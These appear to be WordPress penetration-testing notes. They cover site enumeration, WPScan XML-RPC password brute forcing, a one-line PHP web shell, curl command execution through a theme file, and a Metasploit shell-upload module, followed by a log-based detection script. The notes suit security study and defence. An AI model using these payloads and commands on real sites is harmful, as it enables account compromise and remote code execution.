# WordPress

### Manual Enumeration

```bash
# Confirm that it is a WordPress site
curl -s http://blog.site.local | grep WordPress

# Check installed themes
curl -s http://blog.site.local/ | grep themes

# Check for installed plugins
curl -s http://blog.site.local/ | grep plugins
```

### WPScan

```bash
# Normal scan
sudo wpscan --url http://blog.site.local --enumerate --api-token dEOFB<SNIP>

# Brute forcing logins via XML-RPC
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.site.local
```

## Attacking WordPress

### **Login Bruteforce**

```bash
# Brute forcing logins via XML-RPC
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.site.local
```

### **Code Execution**

```php
# PHP web shell to upload on site
system($_GET[0]);
```

```bash
# Using curl to execute commands
curl 'http://site.local/wp-content/themes/twentynineteen/404.php?0=id'
```

```
# wp_admin_shell_upload can be used to upload a shell and execute it automatically
use exploit/unix/webapp/wp_admin_shell_upload
> set rhosts site.local
> set username john
> set password firebird1
> set lhost 10.10.14.15
> set rhost 10.129.42.195
> set VHOST blog.site.local
```
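
Both techniques above leave recognisable traces in the web server access log: a burst of `POST /xmlrpc.php` requests from one client, and direct requests to a theme `.php` file with a query string. The following detection sketch is an added example, not part of the original notes; the combined log format, the threshold, and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# WordPress includes theme templates itself, so a direct request to a theme
# .php file carrying a query string (like 404.php?0=id) is worth a look.
THEME_PHP_RE = re.compile(r'^/wp-content/themes/[^/]+/[^?]*\.php\?.+')
XMLRPC_THRESHOLD = 5  # assumed value; tune against normal traffic


def analyze(lines, threshold=XMLRPC_THRESHOLD):
    """Return ({ip: xmlrpc POST count >= threshold}, [(ip, path, status)])."""
    xmlrpc_posts = Counter()
    theme_hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, path, status = m.groups()
        if method == "POST" and path.split("?", 1)[0] == "/xmlrpc.php":
            xmlrpc_posts[ip] += 1
        elif THEME_PHP_RE.match(path):
            theme_hits.append((ip, path, int(status)))
    brute = {ip: n for ip, n in xmlrpc_posts.items() if n >= threshold}
    return brute, theme_hits


# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Oct/2023:13:55:{s:02d} +0000] '
    '"POST /xmlrpc.php HTTP/1.1" 200 403 "-" "-"'
    for s in range(6)
] + [
    '198.51.100.20 - - [10/Oct/2023:13:56:01 +0000] '
    '"POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"',
    '198.51.100.20 - - [10/Oct/2023:13:56:05 +0000] '
    '"GET /wp-content/themes/twentynineteen/style.css?ver=1.4 HTTP/1.1" 200 9000 "-" "-"',
    '203.0.113.7 - - [10/Oct/2023:13:57:10 +0000] '
    '"GET /wp-content/themes/twentynineteen/404.php?0=id HTTP/1.1" 200 54 "-" "-"',
]

if __name__ == "__main__":
    brute, hits = analyze(SAMPLE_LOG)
    for ip, n in brute.items():
        print(f"xmlrpc brute-force suspect: {ip} ({n} POSTs)")
    for ip, path, status in hits:
        print(f"direct theme PHP request: {ip} {path} -> {status}")
```

The count covers the whole input rather than a time window, so run it over a bounded slice of the log (for example one hour) when using it on real data.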

